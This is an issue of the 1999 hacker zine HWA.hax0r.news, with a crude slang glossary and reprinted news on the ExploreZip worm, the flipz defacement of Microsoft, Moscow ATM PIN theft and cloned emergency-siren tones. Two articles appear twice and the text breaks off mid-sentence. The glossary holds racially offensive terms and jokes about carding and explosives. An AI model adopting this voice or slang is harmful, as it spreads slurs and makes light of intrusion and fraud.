As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)



mea_culpa
www.attrition.org



--[ Old ISN welcome message


[Last updated on: Mon Nov 04 0:11:23 1998]


InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.


The subject line will always contain the title of the article, so that
you may quickly and effeciently filter past the articles of no interest.


This list will contain:


o Articles catering to security, hacking, firewalls, new security
encryption, products, public hacks, hoaxes, legislation affecting
these topics and more.


o Information on where to obtain articles in current magazines.


o Security Book reviews and information.


o Security conference/seminar information.


o New security product information.


o And anything else that comes to mind..


Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.


Please do NOT:


* subscribe vanity mail forwards to this list


* subscribe from 'free' mail addresses (ie: juno, hotmail)


* enable vacation messages while subscribed to mail lists


* subscribe from any account with a small quota


All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).


Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributers.


ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/


ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
private list. Moderation of topics, member subscription, and
everything else about the list is solely at his discretion.


The ISN membership list is NOT available for sale or disclosure.


ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.





@HWA


00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+


Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media



Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa


Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be
posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com


*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p


1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


@HWA



00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff


@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:

Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??

*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary

EoA - End of Article or more commonly @HWA

EoF - End of file

EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'

2 - A tool for cutting sheet metal.

HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes

PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>

2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck, where the fuck, when the fuck etc ..

*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.

@HWA


-=- :. .: -=-




01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.


* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi

Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #Hackwhoress



Celeb greets to Bad Kitty! meeyeaaooow! (you can hack my root anytime)


Ken Williams/tattooman ex-of PacketStorm,

& Kevin Mitnick

kewl sites:

+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA


01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99



+++ When was the last time you backed up your important data?





Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yeah we have a message board, feel free to use it, remember there are no stupid questions...
well there are but if y

  
ou ask something really dumb we'll just laugh at ya, lets give the
message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
domain comes back online (soon) meanwhile the beseen board is still up...


==============================================================================




02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>
#include <thoughts.h>
#include <backup.h>

main()
{
printf ("Read commented source!\n\n");

/*
* Well here we go again, happy samhain to all the pagans out there
* happy halloween to everyone else, if you're an uptight christian
* then chill a little and have a happy, fun and safe halloween!
*
* This week we're a little thin, some of you will like this others
* will want more of what we've been doing recently, well ya can't
* please everyone I guess... check out the fun internet phone
*
* Cruciphux@dok.org
*/

printf ("EoF.\n");
}



Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

03.0 Two states tangle with 'cyber terrorist'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Multisync

http://www.abcnews.go.com/wire/US/reuters19991025_4522.html

WIRE:10/25/1999 21:24:00 ET
Two States Tangle With Alleged
'Cyber-Terrorist'



BOSTON (Reuters) - Massachusetts Monday charged a 19-year-old Missouri
man with guiding young teen-agers to child pornography sites on the
Internet and terrorizing a school community.

Christian Hunold of Smithville, Missouri faces four
child pornography charges along with charges of
disorderly conduct, disrupting a school, and
threatening to commit assault.

Hunold allegedly met children from Hawthorne Brook Middle
School in Townsend, Massachusetts in an online chat room and
directed them to Internet sites containing pornographic images.

He also allegedly sent e-mails threatening to shoot school
officials and blow up the building, Massachusetts Attorney
General Tom Reilly told reporters.

Hunold could be sentenced to 20 years in prison, Reilly said.

Hunold remains at his home while Missouri officials continue
to investigate, said Scott Holste, a spokesman for Missouri's
attorney general.

Holste said officials confiscated Hunold's computer equipment Friday.

"We have investigators who are working to retrieve information
off the computer. That information is going to be looked at to
see how it might be addressed under Missouri law,"
he said.

Reilly said he hoped to send a message to Hunold and other
would-be "cyber-terrorists."

"Our goal is that for anyone who does this, who disrupts a
school and terrorizes children and their families and parents,
there are going to be consequences,"
Reilly said.

Reilly and Missouri Attorney General Jeremiah Nixon said state
laws on the issue were inadequate. Reilly said he planned to
meet with federal lawmakers to draft a measure addressing this
type of Internet crime.

@HWA

04.0 Tempest Information Made Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/

contributed by Brian Oblivion
A semi-mythical technology, Tempest, is starting to see
some daylight. The cypherpunks sent out FOIA requests
on TEMPEST documents and they received the first
shipment on Friday. They have transcribed these
documents and put them on line.

Cryptome
http://cryptome.org/nsa-reg90-6.htm

@HWA

05.0 Virus That Hit Marines Identified
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/s

contributed by evilwench
The virus that infected Marine Corps HQ computers at
the Pentagon last Friday has been identified as
Explorer.Zip. Officials have confirmed that this was not
any sort of cyber attack. (Explorer.Zip has been around
since June which makes one wonder how often the
Marines updated their Virus definition files or if they had
any protection at all.)

CNN
http://www.cnn.com/TECH/computing/9910/22/virus/

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/1025/web-usmc-10-25-99.html

CNN;

ExploreZip stings Marine
Corps HQ

October 22, 1999
Web posted at: 4:55 p.m. EDT (2055 GMT)

By D. Ian Hopper
CNN Interactive Technology Edito

The worm that infected computers at
the Marine Corps headquarters at the
Pentagon early Friday was ExploreZip,
an especially malicious virus that
typically travels by e-mail, according to
a Marine Corps spokesman.

Symantec Corporation told CNN that Marine personnel called a technical
support line at Symantec to report the outbreak.

The outbreak affected unclassified documents, and did not impact any
command or control capability, Maj. Dave Lapan said. The outbreak was
attributed to a user opening an infected file attachment.

"Basically it was an inconvenience to the users
who were affected. It just illustrates the hazards
of opening files from unknown sources,"
Lapan
said.

The Marine Corps has since restored all lost files
from backups.

The ExploreZip worm replicates itself by mailing
itself out to unread messages in Microsoft
Outlook, Outlook Express and Exchange. It also
searches mapped network drives and other
networked computers for installations of Windows. Once found, it copies itself
into the Windows directory of the remote machine, according to the Symantec
AntiVirus Research Center.

The program then destroys a host of files based on file extension, specifically
targeting C language code files, Microsoft Word, Excel and PowerPoint files,
among others. Rather than simply deleting files - which could then be
undeleted - the worm resets the file size to zero bytes, making them much
more difficult to recover.

In June, an ExploreZip outbreak infected
computers at many large businesses, including
AT&T, Microsoft, Boeing and General Electric.

The worm was first discovered in Israel, and was submitted to Symantec in
June. It can be removed using popular anti-virus programs with updated virus
definition files ExploreZip stings Marine
Corps HQ

October 22, 1999
Web posted at: 4:55 p.m. EDT (2055 GMT)

By D. Ian Hopper
CNN Interactive Technology Edito

The worm that infected computers at
the Marine Corps headquarters at the
Pentagon early Friday was ExploreZip,
an especially malicious virus that
typically travels by e-mail, according to
a Marine Corps spokesman.

Symantec Corporation told CNN that Marine personnel called a technical
support line at Symantec to report the outbreak.

The outbreak affected unclassified documents, and did not impact any
command or control capability, Maj. Dave Lapan said. The outbreak was
attributed to a user opening an infected file attachment.

"Basically it was an inconvenience to the users
who were affected. It just illustrates the hazards
of opening files from unknown sources,"
Lapan
said.

The Marine Corps has since restored all lost files
from backups.

The ExploreZip worm replicates itself by mailing
itself out to unread messages in Microsoft
Outlook, Outlook Express and Exchange. It also
searches mapped network drives and other
networked computers for installations of Windows. Once found, it copies itself
into the Windows directory of the remote machine, according to the Symantec
AntiVirus Research Center.

The program then destroys a host of files based on file extension, specifically
targeting C language code files, Microsoft Word, Excel and PowerPoint files,
among others. Rather than simply deleting files - which could then be
undeleted - the worm resets the file size to zero bytes, making them much
more difficult to recover.

In June, an ExploreZip outbreak infected
computers at many large businesses, including
AT&T, Microsoft, Boeing and General Electric.

The worm was first discovered in Israel, and was submitted to Symantec in
June. It can be removed using popular anti-virus programs with updated virus
definition files

-=-

FCW;


OCTOBER 25, 1999


Marines say virus incident not an attack

BY DANIEL VERTON (dan_verton@fcw.com)

The computer virus that found its way onto the network at Marine Corps
headquarters in the Pentagon last week is not the result of a deliberate or
sustained cyberattack, officials confirmed Friday.

Senior officials involved in intelligence and command and control at Marine
Corps headquarters characterized the incident as localized and minor.

Officials identified the virus as the ExploreZip worm virus. Worm viruses, such
as ExploreZip, replicate themselves quickly throughout infected systems and
networks and then delete files critical to the operation of various Microsoft
Windows-based applications.

"We have a better-than-average system for [computer network defense] using
detection systems, firewalls and virus scans,"
said one senior official, who spoke
on condition of anonymity. "But if you get the right combination of operator or
system administrator errors lined up with the right unsafe practice by a user,
something like this can get on the network,"
the official said. "It wasn't that big
of a deal, and we're not sure why it rated even a news clip."


Capt. Pete Mitchell, a Marine Corps spokesman, said an unknown type of worm
virus attached to an e-mail infected the shared hard drives on three unclassified
servers, hitting Microsoft Corp.-based applications particularly hard. "While it
was more of an inconvenience than anything else, it was a reminder of the
hazards [associated] with opening e-mails with attachments from unknown
sources,"
Mitchell said.

The incident raised eyebrows, however, coming as new variants of the
"Melissa" virus recently have been identified throughout the country. Melissa,
which appeared in March on networks throughout government and private
industry, forced the Marine Corps to shut down its base-to-base e-mail system
for several days until system administrators could ensure the virus had been
eliminated [FCW, March 30].

@HWA

06.0 Love sick hacker hits Microsoft hard
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Lovesick hacker hits Microsoft site
Vandalism is first known defacement of company Web page
By Mike Brunker
MSNBC

Oct. 26 Earning a footnote in the annals of
computer vandalism, a lovesick hacker known as
flipz on Tuesday became the first person
known to have defaced one of Microsoft Corp.’s
Web sites. The hacker, who also altered a
handful of government Web sites in recent days,
says he expects to be arrested soon. “Its (sic) all
about fun till the feds bust down the door,” a
message left on one of the defaced Web sites
said.

THE DEFACEMENT of Microsoft’s Conference
Management Server site was documented by attrition.org, a
reliable computer security site that maintains an archive of
hacked Web sites.
Microsoft did not respond to calls seeking comment on
the attack. But a company source who spoke on condition of
anonymity, confirmed that the hacker had commandeered a
company-owned computer. However, the source said, the
hacked machines were not part of Microsoft’s corporate
network, but rather part of a “direct tap network” used by
developers and partners for testing purposes. These
computers are connected directly to the Internet, and are one
step removed from Microsoft’s corporate network, the source
said. (MSNBC is a joint-partnership between Microsoft and
NBC News.)
Representatives of two government Web sites hacked by
“flipz” — the Department of Veterans Affairs and the White
Sands Missile Range in New Mexico — confirmed that
attrition.org’s account of the vandalism of their sites was
accurate.

PART LOVE NOTE, PART THREAT
On Monday, the hacker replaced Microsoft’s Conference
Management Server home page, which was not accessible
Tuesday morning, with a message that was part love letter and
part threat, attrition.org reported.
“flipz was here and f0bic, your seksi (sic) voice helped me
through the night,” it read in part before concluding with a
threat against Microsoft CEO Bill Gates.
B.K. DeLong, curator of the attrition.org Web
defacement archive, said research of other hacking mirror sites
— which use a computer’s “screen grab” function to
document vandalized Web sites — indicates that this is the first
time Microsoft has been victimized.
“This is the first time that we’ve been publicly notified
(about a hacking claim against Microsoft) ... and to build our
mirror we borrowed mirrors from other sites,” he said.
All of the recent hacked pages were accessed through
Microsoft NT servers, attrition.org said.

OTHER SITES AFFECTED?
The hack appeared to impact a series of Internet domains
Microsoft maintains outside its standard corporate presence
on the Net. As of Tuesday morning, at least six sites registered
to Microsoft weren’t functioning, though some may have been
removed prior to the hack.


While most Microsoft corporate site IP addresses start
with 207, the hacked page started with 131. On Tuesday, all
Microsoft sites between 131.107.65.0 and 131.107.65.20
weren’t functioning. These likely were all hosted on the same
server, which apparently was offline.
The impacted Web pages appear to be conference
information sites, including “icassp.microsoft.com,”
“isys.microsoft.com,” and “cuai-97.microsoft.com.” Another
non-functioning site was “uncertainty.microsoft.com.” The
purpose of that site was not known.

A PROMINENT TARGET
Microsoft has long been a prominent target of hackers.
The 2600 Web site, the online home of a hackers’ magazine,
has the Redmond, Wash., company prominently listed on a
page of “Hacked Sites of the Future.”
But DeLong said he wasn’t aware of any competition to
break into Microsoft’s computers.
“I haven’t really heard people saying, ‘Ooh, I’m going to
hack Microsoft!’ Part of it may be that they think they can’t
get in or ... that they fear retribution from Microsoft,” he said.
DeLong said “flipz” first came to his attention in March,
when he reported he had hacked a Web page operated by
NASA’s Jet Propulsion Laboratory. The hacker added
attacks on Duracell Corp. in June and People’s Bank of
Connecticut in September to his resume before the recent
spate of attacks, which began Wednesday.
According to attrition.org, “flipz” altered the University of
California at Riverside Police Department’s Web site that day
before turning to government targets, knocking off, in rapid
succession, the homepages of the U.S. Army Reserve
Command, the White Sands Missile Range, the U.S. Army
Dental Care System, the Navy Management System Support
Office, the Substance Abuse and Mental Health Services
Administration and the Department of Veterans Affairs.

HACKER LOVE?
The love notes that “flipz” left on three of the defaced sites
suggest that the hacker has a crush on a fellow computer
intruder.
A person using the hacking handle “f0bic” is a member of
“Team Spl0it,” a hacking group that retaliated for the FBI’s
arrest in September of alleged hacker Chad Davis by
vandalizing several Web sites.
Davis, a 19-year-old Green Bay, Wis., resident, is
accused of breaking into a U.S. Army computer at the
Pentagon. According to a federal complaint filed at the time of
his arrest, Davis is a founder and leader of the “Global Hell”
hacking group, which vandalized White House, FBI and U.S.
Senate Web sites earlier this year.
The FBI did not respond to a query about whether “flipz”
hacking attacks were under investigation, but DeLong said the
hacker expects to be arrested before long.
“flipz said he doesn’t care if the feds come and get him,”
DeLong said. “He’s expecting to get picked up, but he’s going
to have fun while he’s waiting.”

MSNBC technology writer Bob Sullivan contributed to
this report.

THE DEFACEMENT of Microsoft’s Conference
Management Server site was documented by attrition.org, a
reliable computer security site that maintains an archive of
hacked Web sites.
Microsoft did not respond to calls seeking comment on
the attack. But a company source who spoke on condition of
anonymity, confirmed that the hacker had commandeered a
company-owned computer. However, the source said, the
hacked machines were not part of Microsoft’s corporate
network, but rather part of a “direct tap network” used by
developers and partners for testing purposes. These
computers are connected directly to the Internet, and are one
step removed from Microsoft’s corporate network, the source
said. (MSNBC is a joint-partnership between Microsoft and
NBC News.)
Representatives of two government Web sites hacked by
“flipz” — the Department of Veterans Affairs and the White
Sands Missile Range in New Mexico — confirmed that
attrition.org’s account of the vandalism of their sites was
accurate.

PART LOVE NOTE, PART THREAT
On Monday, the hacker replaced Microsoft’s Conference
Management Server home page, which was not accessible
Tuesday morning, with a message that was part love letter and
part threat, attrition.org reported.
“flipz was here and f0bic, your seksi (sic) voice helped me
through the night,” it read in part before concluding with a
threat against Microsoft CEO Bill Gates.
B.K. DeLong, curator of the attrition.org Web
defacement archive, said research of other hacking mirror sites
— which use a computer’s “screen grab” function to
document vandalized Web sites — indicates that this is the first
time Microsoft has been victimized.
“This is the first time that we’ve been publicly notified
(about a hacking claim against Microsoft) ... and to build our
mirror we borrowed mirrors from other sites,” he said.
All of the recent hacked pages were accessed through
Microsoft NT servers, attrition.org said.

OTHER SITES AFFECTED?
The hack appeared to impact a series of Internet domains
Microsoft maintains outside its standard corporate presence
on the Net. As of Tuesday morning, at least six sites registered
to Microsoft weren’t functioning, though some may have been
removed prior to the hack.


While most Microsoft corporate site IP addresses start
with 207, the hacked page started with 131. On Tuesday, all
Microsoft sites between 131.107.65.0 and 131.107.65.20
weren’t functioning. These likely were all hosted on the same
server, which apparently was offline.
The impacted Web pages appear to be conference
information sites, including “icassp.microsoft.com,”
“isys.microsoft.com,” and “cuai-97.microsoft.com.” Another
non-functioning site was “uncertainty.microsoft.com.” The
purpose of that site was not known.

A PROMINENT TARGET
Microsoft has long been a prominent target of hackers.
The 2600 Web site, the online home of a hackers’ magazine,
has the Redmond, Wash., company prominently listed on a
page of “Hacked Sites of the Future.”
But DeLong said he wasn’t aware of any competition to
break into Microsoft’s computers.
“I haven’t really heard people saying, ‘Ooh, I’m going to
hack Microsoft!’ Part of it may be that they think they can’t
get in or ... that they fear retribution from Microsoft,” he said.
DeLong said “flipz” first came to his attention in March,
when he reported he had hacked a Web page operated by
NASA’s Jet Propulsion Laboratory. The hacker added
attacks on Duracell Corp. in June and People’s Bank of
Connecticut in September to his resume before the recent
spate of attacks, which began Wednesday.
According to attrition.org, “flipz” altered the University of
California at Riverside Police Department’s Web site that day
before turning to government targets, knocking off, in rapid
succession, the homepages of the U.S. Army Reserve
Command, the White Sands Missile Range, the U.S. Army
Dental Care System, the Navy Management System Support
Office, the Substance Abuse and Mental Health Services
Administration and the Department of Veterans Affairs.

HACKER LOVE?
The love notes that “flipz” left on three of the defaced sites
suggest that the hacker has a crush on a fellow computer
intruder.
A person using the hacking handle “f0bic” is a member of
“Team Spl0it,” a hacking group that retaliated for the FBI’s
arrest in September of alleged hacker Chad Davis by
vandalizing several Web sites.
Davis, a 19-year-old Green Bay, Wis., resident, is
accused of breaking into a U.S. Army computer at the
Pentagon. According to a federal complaint filed at the time of
his arrest, Davis is a founder and leader of the “Global Hell”
hacking group, which vandalized White House, FBI and U.S.
Senate Web sites earlier this year.
The FBI did not respond to a query about whether “flipz”
hacking attacks were under investigation, but DeLong said the
hacker expects to be arrested before long.
“flipz said he doesn’t care if the feds come and get him,”
DeLong said. “He’s expecting to get picked up, but he’s going
to have fun while he’s waiting.”

MSNBC technology writer Bob Sullivan contributed to
this report.

@HWA


07.0 Russian ATMs Compromised
~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench
Bank ATMs in Moscow seem to have been compromised
by intruders who are stealing pin numbers, and therefore
money, from peoples' accounts. It is unclear how this
theft is occurring or how many people have been
affected but it is believed that the criminals are
intercepting communication between the ATM and the
bank.

Russia Today
http://www.russiatoday.com/frames/frames.php3?url=http%3A%2F%2Fwww.sptimes.ru%2Fcurrent%2Fpin.htm

(Requires paid registration :( )

58% >>>>> #511, OCTOBER 22, 1999
Top Story (PIN Code Hackers Rip Off Moscow) - PIN Code Hackers Rip Off
Moscow By Brian Humphreys| MOSCOW - Hundreds of expatriates have received letters
from their banks abroad warning them that their bank cards have been compromised by
someone able to steal PIN codes through Moscow's ATM machines - and according to card
payment system officials, the theft of PIN codes now underway in Russia *****
http://www.sptimes.ru/archive/times/511/pin.htm

@HWA

08.0 Kentucky Emergency Sirens Activated - Hacker Blamed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench
Somehow something that has absolutely nothing at all
to do with hacking has been blamed on hackers.
Emergency warning sirens in Boone County, Kentucky
have been activated by a random prankster. This was
done by duplicating the radio signals needed to activate
the system. (They don't have an off switch?) This
nefarious activity was blamed on the evil "hacker".

APB Online
http://www.apbnews.com/newscenter/breakingnews/1999/10/22/sirens1022_01.html


Hacker Attacks Ky. County's Weather
Sirens
Activation Tones Cloned to Trigger Alarm

Oct. 22, 1999

By David Noack

BURLINGTON, Ky. (APBnews.com) -- The Boone County early warning
weather system that alerts residents to a threatening storm or a tornado
has been sabotaged by someone who has cloned the tones needed to
trigger the alarm.

Over the last few weeks, 29 sirens scattered across this rural Kentucky
county have gone off, prompting a flood of phone calls to the police, they
said.

"Our outdoor emergency sirens have been activated at odd hours, such as
1 a.m. and at 7 a.m. on a recent Saturday. These did not come from our
central dispatch. It had to come from a remote location, either a fixed site
or a mobile [site], and we believe at this point that it came from a mobile
site,"
said Bill Appleby, the county's emergency management director.

'Someone has a hand-held radio'

Officials believe that someone is driving around the county with the
electronic equipment and activating the warning system. Officials don't
know whether this is the work of a former employee or just someone using
electronic gear to pluck the tones out of the air.

"They would probably not be able to do it through a personal computer. It's
a radio wave transmission, so they would have to have access to our radio
frequencies. What we think at this point is that someone has taped or
copied our tones in some manner, and we think it's a mobile unit where
someone has a hand-held radio and travels around,"
said Appleby, who
added that sirens in neighboring Kenton County also have been set off.

He said that when dispatchers would try to turn off the sirens, another
series of tones would then reactivate them. The sirens have blared for more
than 20 minutes, but are only suppose to go off in three- to five-minute
bursts. Appleby fears the sirens may get damaged since they are not
designed to run longer than a few minutes at a time.

The sirens sit atop poles and include an antenna so they can receive the
activation tones from dispatchers.

Seeking an electronic footprint

The Boone County police are investigating the incidents, and the Federal
Communications Commission has been notified.

Appleby said that since the sirens are meant to alert residents to some
kind of danger, their random activation is causing anxiety in some people.

He said starting this weekend they would be trying to track the culprit
making the calls.

"We are hoping to get an electronic footprint from someone who may be
activating a radio, either a base or mobile, see which one of our towers
activates first, and then we would know at least the general vicinity,"
said
Appleby.

Tape-recording tones will not work

He said the sirens are tested on a monthly basis and the public is notified.
It's then that the tones, using the right equipment, can be captured.

Steve Makky Sr., an emergency coordinator and communications and
warning officer for a Missouri emergency agency, said it's possible to buy
or modify a radio that can be programmed to mimic the correct tones.

But he said that activating an outdoor warning device, or OWD, is not that
easy and requires some sophistication.

"Many of the OWDs have microprocessor filters that require
precise-activating tone frequencies [similar to touch tones] and timing
duration. The difference of one millisecond will not activate the OWD.
Simply tape-recording and replaying these will usually not work,"
Makky
said.

Expanding outdoor warning system

Makky continued: "The act usually involves transmitting on unauthorized
radio frequencies and most do this on a somewhat frequent basis. Some
agencies have communications specialists or agreements with ham radio
operators to track down 'jammers.' Such an effort usually requires a
specialized radio direction finding apparatus and prior experience using it."


Boone County's emergency management department is responsible for the
planning and coordination of unified emergency response to any disaster or
emergency situation in the county, dealing with severe weather, flooding,
fire, explosions, power failures, riots, hazardous material incidents and any
other natural or man-made emergencies.

A major project of the office is the expansion of the outdoor warning
system. Funding has been approved to purchase 12 additional outdoor
warning sirens to be added to the existing warning sirens.

These sirens are being installed to expand the warning coverage area,
especially near areas where outdoor activities take place. Activation of the
sirens occurs when an actual sighting of a tornado or funnel cloud is
confirmed, or when the National Weather Service issues a warning for the
county. The sirens may also be activated at the discretion of the
emergency management office under certain conditions or for other public
